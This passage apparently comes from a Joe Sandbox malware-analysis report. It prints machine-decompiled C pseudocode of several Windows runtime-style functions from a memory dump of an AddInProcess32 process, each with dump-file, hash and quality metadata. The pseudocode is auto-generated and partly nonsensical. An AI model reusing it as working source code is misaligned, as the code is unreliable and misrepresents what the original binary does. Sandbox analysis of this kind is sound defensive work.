                              											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                              										}
                              										_t257 =  *_t205;
                              										_v48 = 0;
                              										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                              										_v56 = 0;
                              										_v52 = 0;
                              										_t144 =  *( *[fs:0x30] + 0x50);
                              										if(_t144 != 0) {
                              											__eflags =  *_t144;
                              											if( *_t144 == 0) {
                              												goto L20;
                              											}
                              											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                              											goto L21;
                              										} else {
                              											L20:
                              											_t145 = 0x7ffe0384;
                              											L21:
                              											if( *_t145 != 0) {
                              												_t146 =  *[fs:0x30];
                              												__eflags =  *(_t146 + 0x240) & 0x00000004;
                              												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                              													_t147 = E01877D50();
                              													__eflags = _t147;
                              													if(_t147 == 0) {
                              														_t148 = 0x7ffe0385;
                              													} else {
                              														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                              													}
                              													__eflags =  *_t148 & 0x00000020;
                              													if(( *_t148 & 0x00000020) != 0) {
                              														_t149 = _v72;
                              														__eflags = _t149;
                              														if(__eflags == 0) {
                              															_t149 = 0x1835c80;
                              														}
                              														_push(_t149);
                              														_push( &_v48);
                              														 *((char*)(_t267 + 0xb)) = E0188F6E0(_t198, _t242, _t257, __eflags);
                              														_push(_t257);
                              														_push( &_v64);
                              														_t153 = E0188F6E0(_t198, _t242, _t257, __eflags);
                              														__eflags =  *((char*)(_t267 + 0xb));
                              														if( *((char*)(_t267 + 0xb)) != 0) {
                              															__eflags = _t153;
                              															if(_t153 != 0) {
                              																__eflags = 0;
                              																E018D7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                              																L01872400(_t267 + 0x20);
                              															}
                              															L01872400( &_v64);
                              														}
                              													}
                              												}
                              											}
                              											_t129 = 0;
                              											L23:
                              											return _t129;
                              										}
                              									}
                              								}
                              							}
                              							L8:
                              							_t275 = _t240;
                              							if(_t275 != 0) {
                              								_v73 = 0;
                              								_t253 = 0;
                              								__eflags = 0;
                              								L29:
                              								_push(0);
                              								_t241 = E01882397(_t240);
                              								__eflags = _t241;
                              								if(_t241 == 0) {
                              									_t229 = 0;
                              									L14:
                              									_t135 = 0;
                              									goto L15;
                              								}
                              								__eflags =  *((char*)(_t267 + 0xb));
                              								 *(_t241 + 0x34) = 1;
                              								if( *((char*)(_t267 + 0xb)) != 0) {
                              									E01872280(_t134, 0x1948608);
                              									__eflags =  *0x1946e48 - _t253; // 0x0
                              									if(__eflags != 0) {
                              										L48:
                              										_t253 = 0;
                              										__eflags = 0;
                              										L49:
                              										E0186FFB0(_t198, _t241, 0x1948608);
                              										__eflags = _t253;
                              										if(_t253 != 0) {
                              											L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                              										}
                              										goto L31;
                              									}
                              									 *0x1946e48 = _t241;
                              									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                              									__eflags = _t253;
                              									if(_t253 != 0) {
                              										_t57 = _t253 + 0x34;
                              										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                              										__eflags =  *_t57;
                              										if( *_t57 == 0) {
                              											goto L49;
                              										}
                              									}
                              									goto L48;
                              								}
                              								L31:
                              								_t229 = _t241;
                              								goto L14;
                              							}
                              							_v73 = 1;
                              							_v64 = _t240;
                              							asm("lock bts dword [esi], 0x0");
                              							if(_t275 < 0) {
                              								_t231 =  *0x1948608; // 0x0
                              								while(1) {
                              									_v60 = _t231;
                              									__eflags = _t231 & 0x00000001;
                              									if((_t231 & 0x00000001) != 0) {
                              										goto L76;
                              									}
                              									_t73 = _t231 + 1; // 0x1
                              									_t210 = _t73;
                              									asm("lock cmpxchg [edi], ecx");
                              									__eflags = _t231 - _t231;
                              									if(_t231 != _t231) {
                              										L92:
                              										_t133 = E01886B90(_t210,  &_v64);
                              										_t262 =  *0x1948608; // 0x0
                              										L93:
                              										_t231 = _t262;
                              										continue;
                              									}
                              									_t240 = _v56;
                              									goto L10;
                              									L76:
                              									_t169 = E0188E180(_t133);
                              									__eflags = _t169;
                              									if(_t169 != 0) {
                              										_push(0xc000004b);
                              										_push(0xffffffff);
                              										E018997C0();
                              										_t231 = _v68;
                              									}
                              									_v72 = 0;
                              									_v24 =  *( *[fs:0x18] + 0x24);
                              									_v16 = 3;
                              									_v28 = 0;
                              									__eflags = _t231 & 0x00000002;
                              									if((_t231 & 0x00000002) == 0) {
                              										_v32 =  &_v36;
                              										_t174 = _t231 >> 4;
                              										__eflags = 1 - _t174;
                              										_v20 = _t174;
                              										asm("sbb ecx, ecx");
                              										_t210 = 3 |  &_v36;
                              										__eflags = _t174;
                              										if(_t174 == 0) {
                              											_v20 = 0xfffffffe;
                              										}
                              									} else {
                              										_v32 = 0;
                              										_v20 = 0xffffffff;
                              										_v36 = _t231 & 0xfffffff0;
                              										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                              										_v72 =  !(_t231 >> 2) & 0xffffff01;
                              									}
                              									asm("lock cmpxchg [edi], esi");
                              									_t262 = _t231;
                              									__eflags = _t262 - _t231;
                              									if(_t262 != _t231) {
                              										goto L92;
                              									} else {
                              										__eflags = _v72;
                              										if(_v72 != 0) {
                              											E0189006A(0x1948608, _t210);
                              										}
                              										__eflags =  *0x7ffe036a - 1;
                              										if(__eflags <= 0) {
                              											L89:
                              											_t133 =  &_v16;
                              											asm("lock btr dword [eax], 0x1");
                              											if(__eflags >= 0) {
                              												goto L93;
                              											} else {
                              												goto L90;
                              											}
                              											do {
                              												L90:
                              												_push(0);
                              												_push(0x1948608);
                              												E0189B180();
                              												_t133 = _v24;
                              												__eflags = _t133 & 0x00000004;
                              											} while ((_t133 & 0x00000004) == 0);
                              											goto L93;
                              										} else {
                              											_t218 =  *0x1946904; // 0x400
                              											__eflags = _t218;
                              											if(__eflags == 0) {
                              												goto L89;
                              											} else {
                              												goto L87;
                              											}
                              											while(1) {
                              												L87:
                              												__eflags = _v16 & 0x00000002;
                              												if(__eflags == 0) {
                              													goto L89;
                              												}
                              												asm("pause");
                              												_t218 = _t218 - 1;
                              												__eflags = _t218;
                              												if(__eflags != 0) {
                              													continue;
                              												}
                              												goto L89;
                              											}
                              											goto L89;
                              										}
                              									}
                              								}
                              							}
                              							L10:
                              							_t229 =  *0x1946e48; // 0x0
                              							_v72 = _t229;
                              							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                              								E0186FFB0(_t198, _t240, 0x1948608);
                              								_t253 = _v76;
                              								goto L29;
                              							} else {
                              								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                              								asm("lock cmpxchg [esi], ecx");
                              								_t215 = 1;
                              								if(1 != 1) {
                              									while(1) {
                              										_t246 = _t215 & 0x00000006;
                              										_t180 = _t215;
                              										__eflags = _t246 - 2;
                              										_v56 = _t246;
                              										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                              										asm("lock cmpxchg [edi], esi");
                              										_t248 = _v56;
                              										__eflags = _t180 - _t215;
                              										if(_t180 == _t215) {
                              											break;
                              										}
                              										_t215 = _t180;
                              									}
                              									__eflags = _t248 - 2;
                              									if(_t248 == 2) {
                              										__eflags = 0;
                              										E018900C2(0x1948608, 0, _t235);
                              									}
                              									_t229 = _v72;
                              								}
                              								goto L14;
                              							}
                              						}
                              					}
                              				}
                              				_t227 = 0;
                              				_v75 = 0;
                              				if(_t128 != 0) {
                              					goto L4;
                              				}
                              				goto L2;
                              			}


                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d0f76883544f2d0869014b933d1706d93667ebfa2e11090d605dba76c7cdb944
                              • Instruction ID: 20c89de927e5d1b0a913c4b816778ff9892fa039550da58a88910897197be361
                              • Opcode Fuzzy Hash: d0f76883544f2d0869014b933d1706d93667ebfa2e11090d605dba76c7cdb944
                              • Instruction Fuzzy Hash: 90F127357083019FDB26DF2CC440B6BBBE2AF85728F14855DE999DB291D734EA41CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E0186849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                              				void* _t136;
                              				signed int _t139;
                              				signed int _t141;
                              				signed int _t145;
                              				intOrPtr _t146;
                              				signed int _t149;
                              				signed int _t150;
                              				signed int _t161;
                              				signed int _t163;
                              				signed int _t165;
                              				signed int _t169;
                              				signed int _t171;
                              				signed int _t194;
                              				signed int _t200;
                              				void* _t201;
                              				signed int _t204;
                              				signed int _t206;
                              				signed int _t210;
                              				signed int _t214;
                              				signed int _t215;
                              				signed int _t218;
                              				void* _t221;
                              				signed int _t224;
                              				signed int _t226;
                              				intOrPtr _t228;
                              				signed int _t232;
                              				signed int _t233;
                              				signed int _t234;
                              				void* _t237;
                              				void* _t238;
                              
                              				_t236 = __esi;
                              				_t235 = __edi;
                              				_t193 = __ebx;
                              				_push(0x70);
                              				_push(0x192f9c0);
                              				E018AD0E8(__ebx, __edi, __esi);
                              				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                              				if( *0x1947b04 == 0) {
                              					L4:
                              					goto L5;
                              				} else {
                              					_t136 = E0186CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                              					_t236 = 0;
                              					if(_t136 < 0) {
                              						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                              					}
                              					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                              						_t193 =  *( *[fs:0x30] + 0x18);
                              						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                              						 *(_t237 - 0x68) = _t236;
                              						 *(_t237 - 0x6c) = _t236;
                              						_t235 = _t236;
                              						 *(_t237 - 0x60) = _t236;
                              						E01872280( *[fs:0x30], 0x1948550);
                              						_t139 =  *0x1947b04; // 0x1
                              						__eflags = _t139 - 1;
                              						if(__eflags != 0) {
                              							_t200 = 0xc;
                              							_t201 = _t237 - 0x40;
                              							_t141 = E0188F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                              							 *(_t237 - 0x44) = _t141;
                              							__eflags = _t141;
                              							if(_t141 < 0) {
                              								L50:
                              								E0186FFB0(_t193, _t235, 0x1948550);
                              								L5:
                              								return E018AD130(_t193, _t235, _t236);
                              							}
                              							_push(_t201);
                              							_t221 = 0x10;
                              							_t202 =  *(_t237 - 0x40);
                              							_t145 = E01851C45( *(_t237 - 0x40), _t221);
                              							 *(_t237 - 0x44) = _t145;
                              							__eflags = _t145;
                              							if(_t145 < 0) {
                              								goto L50;
                              							}
                              							_t146 =  *0x1947b9c; // 0x0
                              							_t235 = L01874620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                              							 *(_t237 - 0x60) = _t235;
                              							__eflags = _t235;
                              							if(_t235 == 0) {
                              								_t149 = 0xc0000017;
                              								 *(_t237 - 0x44) = 0xc0000017;
                              							} else {
                              								_t149 =  *(_t237 - 0x44);
                              							}
                              							__eflags = _t149;
                              							if(__eflags >= 0) {
                              								L8:
                              								 *(_t237 - 0x64) = _t235;
                              								_t150 =  *0x1947b10; // 0x0
                              								 *(_t237 - 0x4c) = _t150;
                              								_push(_t237 - 0x74);
                              								_push(_t237 - 0x39);
                              								_push(_t237 - 0x58);
                              								_t193 = E0188A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                              								 *(_t237 - 0x44) = _t193;
                              								__eflags = _t193;
                              								if(_t193 < 0) {
                              									L30:
                              									E0186FFB0(_t193, _t235, 0x1948550);
                              									__eflags = _t235 - _t237 - 0x38;
                              									if(_t235 != _t237 - 0x38) {
                              										_t235 =  *(_t237 - 0x48);
                              										L018777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                              									} else {
                              										_t235 =  *(_t237 - 0x48);
                              									}
                              									__eflags =  *(_t237 - 0x6c);
                              									if( *(_t237 - 0x6c) != 0) {
                              										L018777F0(_t235, _t236,  *(_t237 - 0x6c));
                              									}
                              									__eflags = _t193;
                              									if(_t193 >= 0) {
                              										goto L4;
                              									} else {
                              										goto L5;
                              									}
                              								}
                              								_t204 =  *0x1947b04; // 0x1
                              								 *(_t235 + 8) = _t204;
                              								__eflags =  *((char*)(_t237 - 0x39));
                              								if( *((char*)(_t237 - 0x39)) != 0) {
                              									 *(_t235 + 4) = 1;
                              									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                              									_t161 =  *0x1947b10; // 0x0
                              									 *(_t237 - 0x4c) = _t161;
                              								} else {
                              									 *(_t235 + 4) = _t236;
                              									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                              								}
                              								 *((intOrPtr*)(_t237 - 0x54)) = E018937C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                              								_t224 = _t236;
                              								 *(_t237 - 0x40) = _t236;
                              								 *(_t237 - 0x50) = _t236;
                              								while(1) {
                              									_t163 =  *(_t235 + 8);
                              									__eflags = _t224 - _t163;
                              									if(_t224 >= _t163) {
                              										break;
                              									}
                              									_t228 =  *0x1947b9c; // 0x0
                              									_t214 = L01874620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                              									 *(_t237 - 0x78) = _t214;
                              									__eflags = _t214;
                              									if(_t214 == 0) {
                              										L52:
                              										_t193 = 0xc0000017;
                              										L19:
                              										 *(_t237 - 0x44) = _t193;
                              										L20:
                              										_t206 =  *(_t237 - 0x40);
                              										__eflags = _t206;
                              										if(_t206 == 0) {
                              											L26:
                              											__eflags = _t193;
                              											if(_t193 < 0) {
                              												E018937F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                              												__eflags =  *((char*)(_t237 - 0x39));
                              												if( *((char*)(_t237 - 0x39)) != 0) {
                              													 *0x1947b10 =  *0x1947b10 - 8;
                              												}
                              											} else {
                              												_t169 =  *(_t237 - 0x68);
                              												__eflags = _t169;
                              												if(_t169 != 0) {
                              													 *0x1947b04 =  *0x1947b04 - _t169;
                              												}
                              											}
                              											__eflags = _t193;
                              											if(_t193 >= 0) {
                              												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                              											}
                              											goto L30;
                              										}
                              										_t226 = _t206 * 0xc;
                              										__eflags = _t226;
                              										_t194 =  *(_t237 - 0x48);
                              										do {
                              											 *(_t237 - 0x40) = _t206 - 1;
                              											_t226 = _t226 - 0xc;
                              											 *(_t237 - 0x4c) = _t226;
                              											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                              											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                              												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                              												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                              													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                              													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                              													__eflags =  *((char*)(_t237 - 0x39));
                              													if( *((char*)(_t237 - 0x39)) == 0) {
                              														_t171 = _t210;
                              													} else {
                              														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                              														L018777F0(_t194, _t236, _t210 - 8);
                              														_t171 =  *(_t237 - 0x50);
                              													}
                              													L48:
                              													L018777F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                              													L46:
                              													_t206 =  *(_t237 - 0x40);
                              													_t226 =  *(_t237 - 0x4c);
                              													goto L24;
                              												}
                              												 *0x1947b08 =  *0x1947b08 + 1;
                              												goto L24;
                              											}
                              											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                              											__eflags = _t171;
                              											if(_t171 != 0) {
                              												__eflags =  *((char*)(_t237 - 0x39));
                              												if( *((char*)(_t237 - 0x39)) == 0) {
                              													goto L48;
                              												}
                              												E018957C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                              												goto L46;
                              											}
                              											L24:
                              											__eflags = _t206;
                              										} while (_t206 != 0);
                              										_t193 =  *(_t237 - 0x44);
                              										goto L26;
                              									}
                              									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                              									 *(_t237 - 0x7c) = _t232;
                              									 *(_t232 - 4) = _t214;
                              									 *(_t237 - 4) = _t236;
                              									E0189F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                              									_t238 = _t238 + 0xc;
                              									 *(_t237 - 4) = 0xfffffffe;
                              									_t215 =  *(_t237 - 0x48);
                              									__eflags = _t193;
                              									if(_t193 < 0) {
                              										L018777F0(_t215, _t236,  *(_t237 - 0x78));
                              										goto L20;
                              									}
                              									__eflags =  *((char*)(_t237 - 0x39));
                              									if( *((char*)(_t237 - 0x39)) != 0) {
                              										_t233 = E0188A44B( *(_t237 - 0x4c));
                              										 *(_t237 - 0x50) = _t233;
                              										__eflags = _t233;
                              										if(_t233 == 0) {
                              											L018777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                              											goto L52;
                              										}
                              										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                              										L17:
                              										_t234 =  *(_t237 - 0x40);
                              										_t218 = _t234 * 0xc;
                              										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                              										 *(_t218 + _t235 + 0x10) = _t236;
                              										_t224 = _t234 + 1;
                              										 *(_t237 - 0x40) = _t224;
                              										 *(_t237 - 0x50) = _t224;
                              										_t193 =  *(_t237 - 0x44);
                              										continue;
                              									}
                              									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                              									goto L17;
                              								}
                              								 *_t235 = _t236;
                              								_t165 = 0x10 + _t163 * 0xc;
                              								__eflags = _t165;
                              								_push(_t165);
                              								_push(_t235);
                              								_push(0x23);
                              								_push(0xffffffff);
                              								_t193 = E018996C0();
                              								goto L19;
                              							} else {
                              								goto L50;
                              							}
                              						}
                              						_t235 = _t237 - 0x38;
                              						 *(_t237 - 0x60) = _t235;
                              						goto L8;
                              					}
                              					goto L4;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1615cde47f398d58f2678be38c565d288b5512b7d89fff76ce1ffd962aa32d45
                              • Instruction ID: 61ea88a054206005529e40e9e0a8bb948366ea7d13700fd95c74c563c293bb35
                              • Opcode Fuzzy Hash: 1615cde47f398d58f2678be38c565d288b5512b7d89fff76ce1ffd962aa32d45
                              • Instruction Fuzzy Hash: 7DB13BB4E00359DFDB15DFD9C984AADBBB9BF49308F104129E609EB345DB70AA41CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 67%
                              			E0185C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                              				signed int _v8;
                              				char _v1036;
                              				signed int _v1040;
                              				char _v1048;
                              				signed int _v1052;
                              				signed char _v1056;
                              				void* _v1058;
                              				char _v1060;
                              				signed int _v1064;
                              				void* _v1068;
                              				intOrPtr _v1072;
                              				void* _v1084;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr _t70;
                              				intOrPtr _t72;
                              				signed int _t74;
                              				intOrPtr _t77;
                              				signed int _t78;
                              				signed int _t81;
                              				void* _t101;
                              				signed int _t102;
                              				signed int _t107;
                              				signed int _t109;
                              				signed int _t110;
                              				signed char _t111;
                              				signed int _t112;
                              				signed int _t113;
                              				signed int _t114;
                              				intOrPtr _t116;
                              				void* _t117;
                              				char _t118;
                              				void* _t120;
                              				char _t121;
                              				signed int _t122;
                              				signed int _t123;
                              				signed int _t125;
                              
                              				_t125 = (_t123 & 0xfffffff8) - 0x424;
                              				_v8 =  *0x194d360 ^ _t125;
                              				_t116 = _a4;
                              				_v1056 = _a16;
                              				_v1040 = _a24;
                              				if(E01866D30( &_v1048, _a8) < 0) {
                              					L4:
                              					_pop(_t117);
                              					_pop(_t120);
                              					_pop(_t101);
                              					return E0189B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                              				}
                              				_t70 = _a20;
                              				if(_t70 >= 0x3f4) {
                              					_t121 = _t70 + 0xc;
                              					L19:
                              					_t107 =  *( *[fs:0x30] + 0x18);
                              					__eflags = _t107;
                              					if(_t107 == 0) {
                              						L60:
                              						_t68 = 0xc0000017;
                              						goto L4;
                              					}
                              					_t72 =  *0x1947b9c; // 0x0
                              					_t74 = L01874620(_t107, _t107, _t72 + 0x180000, _t121);
                              					_v1064 = _t74;
                              					__eflags = _t74;
                              					if(_t74 == 0) {
                              						goto L60;
                              					}
                              					_t102 = _t74;
                              					_push( &_v1060);
                              					_push(_t121);
                              					_push(_t74);
                              					_push(2);
                              					_push( &_v1048);
                              					_push(_t116);
                              					_t122 = E01899650();
                              					__eflags = _t122;
                              					if(_t122 >= 0) {
                              						L7:
                              						_t114 = _a12;
                              						__eflags = _t114;
                              						if(_t114 != 0) {
                              							_t77 = _a20;
                              							L26:
                              							_t109 =  *(_t102 + 4);
                              							__eflags = _t109 - 3;
                              							if(_t109 == 3) {
                              								L55:
                              								__eflags = _t114 - _t109;
                              								if(_t114 != _t109) {
                              									L59:
                              									_t122 = 0xc0000024;
                              									L15:
                              									_t78 = _v1052;
                              									__eflags = _t78;
                              									if(_t78 != 0) {
                              										L018777F0( *( *[fs:0x30] + 0x18), 0, _t78);
                              									}
                              									_t68 = _t122;
                              									goto L4;
                              								}
                              								_t110 = _v1056;
                              								_t118 =  *((intOrPtr*)(_t102 + 8));
                              								_v1060 = _t118;
                              								__eflags = _t110;
                              								if(_t110 == 0) {
                              									L10:
                              									_t122 = 0x80000005;
                              									L11:
                              									_t81 = _v1040;
                              									__eflags = _t81;
                              									if(_t81 == 0) {
                              										goto L15;
                              									}
                              									__eflags = _t122;
                              									if(_t122 >= 0) {
                              										L14:
                              										 *_t81 = _t118;
                              										goto L15;
                              									}
                              									__eflags = _t122 - 0x80000005;
                              									if(_t122 != 0x80000005) {
                              										goto L15;
                              									}
                              									goto L14;
                              								}
                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                              								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                              									goto L10;
                              								}
                              								_push( *((intOrPtr*)(_t102 + 8)));
                              								_t59 = _t102 + 0xc; // 0xc
                              								_push(_t110);
                              								L54:
                              								E0189F3E0();
                              								_t125 = _t125 + 0xc;
                              								goto L11;
                              							}
                              							__eflags = _t109 - 7;
                              							if(_t109 == 7) {
                              								goto L55;
                              							}
                              							_t118 = 4;
                              							__eflags = _t109 - _t118;
                              							if(_t109 != _t118) {
                              								__eflags = _t109 - 0xb;
                              								if(_t109 != 0xb) {
                              									__eflags = _t109 - 1;
                              									if(_t109 == 1) {
                              										__eflags = _t114 - _t118;
                              										if(_t114 != _t118) {
                              											_t118 =  *((intOrPtr*)(_t102 + 8));
                              											_v1060 = _t118;
                              											__eflags = _t118 - _t77;
                              											if(_t118 > _t77) {
                              												goto L10;
                              											}
                              											_push(_t118);
                              											_t56 = _t102 + 0xc; // 0xc
                              											_push(_v1056);
                              											goto L54;
                              										}
                              										__eflags = _t77 - _t118;
                              										if(_t77 != _t118) {
                              											L34:
                              											_t122 = 0xc0000004;
                              											goto L15;
                              										}
                              										_t111 = _v1056;
                              										__eflags = _t111 & 0x00000003;
                              										if((_t111 & 0x00000003) == 0) {
                              											_v1060 = _t118;
                              											__eflags = _t111;
                              											if(__eflags == 0) {
                              												goto L10;
                              											}
                              											_t42 = _t102 + 0xc; // 0xc
                              											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                              											_v1048 =  *((intOrPtr*)(_t102 + 8));
                              											_push(_t111);
                              											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                              											_push(0);
                              											_push( &_v1048);
                              											_t122 = E018913C0(_t102, _t118, _t122, __eflags);
                              											L44:
                              											_t118 = _v1072;
                              											goto L11;
                              										}
                              										_t122 = 0x80000002;
                              										goto L15;
                              									}
                              									_t122 = 0xc0000024;
                              									goto L44;
                              								}
                              								__eflags = _t114 - _t109;
                              								if(_t114 != _t109) {
                              									goto L59;
                              								}
                              								_t118 = 8;
                              								__eflags = _t77 - _t118;
                              								if(_t77 != _t118) {
                              									goto L34;
                              								}
                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                              								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                              									goto L34;
                              								}
                              								_t112 = _v1056;
                              								_v1060 = _t118;
                              								__eflags = _t112;
                              								if(_t112 == 0) {
                              									goto L10;
                              								}
                              								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                              								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                              								goto L11;
                              							}
                              							__eflags = _t114 - _t118;
                              							if(_t114 != _t118) {
                              								goto L59;
                              							}
                              							__eflags = _t77 - _t118;
                              							if(_t77 != _t118) {
                              								goto L34;
                              							}
                              							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                              							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                              								goto L34;
                              							}
                              							_t113 = _v1056;
                              							_v1060 = _t118;
                              							__eflags = _t113;
                              							if(_t113 == 0) {
                              								goto L10;
                              							}
                              							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                              							goto L11;
                              						}
                              						_t118 =  *((intOrPtr*)(_t102 + 8));
                              						__eflags = _t118 - _a20;
                              						if(_t118 <= _a20) {
                              							_t114 =  *(_t102 + 4);
                              							_t77 = _t118;
                              							goto L26;
                              						}
                              						_v1060 = _t118;
                              						goto L10;
                              					}
                              					__eflags = _t122 - 0x80000005;
                              					if(_t122 != 0x80000005) {
                              						goto L15;
                              					}
                              					L018777F0( *( *[fs:0x30] + 0x18), 0, _t102);
                              					L18:
                              					_t121 = _v1060;
                              					goto L19;
                              				}
                              				_push( &_v1060);
                              				_push(0x400);
                              				_t102 =  &_v1036;
                              				_push(_t102);
                              				_push(2);
                              				_push( &_v1048);
                              				_push(_t116);
                              				_t122 = E01899650();
                              				if(_t122 >= 0) {
                              					__eflags = 0;
                              					_v1052 = 0;
                              					goto L7;
                              				}
                              				if(_t122 == 0x80000005) {
                              					goto L18;
                              				}
                              				goto L4;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • Opcode ID: 02540c8fef4319c453aac1e83dc10682276c73dbd9174f19131f7a34038f40a8
                              • Instruction ID: af994b265394e14a9fa008b3b62fc916ceac980b0b0d7284b6102503d88f53df
                              • Opcode Fuzzy Hash: 02540c8fef4319c453aac1e83dc10682276c73dbd9174f19131f7a34038f40a8
                              • Instruction Fuzzy Hash: 978191756042069BDB26CE5CC880A7A77E9FB84B54F14482EEE45DB241D330EF45CFA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 39%
                              			E018EB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                              				char _v8;
                              				signed int _v12;
                              				signed int _t80;
                              				signed int _t83;
                              				intOrPtr _t89;
                              				signed int _t92;
                              				signed char _t106;
                              				signed int* _t107;
                              				intOrPtr _t108;
                              				intOrPtr _t109;
                              				signed int _t114;
                              				void* _t115;
                              				void* _t117;
                              				void* _t119;
                              				void* _t122;
                              				signed int _t123;
                              				signed int* _t124;
                              
                              				_t106 = _a12;
                              				if((_t106 & 0xfffffffc) != 0) {
                              					return 0xc000000d;
                              				}
                              				if((_t106 & 0x00000002) != 0) {
                              					_t106 = _t106 | 0x00000001;
                              				}
                              				_t109 =  *0x1947b9c; // 0x0
                              				_t124 = L01874620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                              				if(_t124 != 0) {
                              					 *_t124 =  *_t124 & 0x00000000;
                              					_t124[1] = _t124[1] & 0x00000000;
                              					_t124[4] = _t124[4] & 0x00000000;
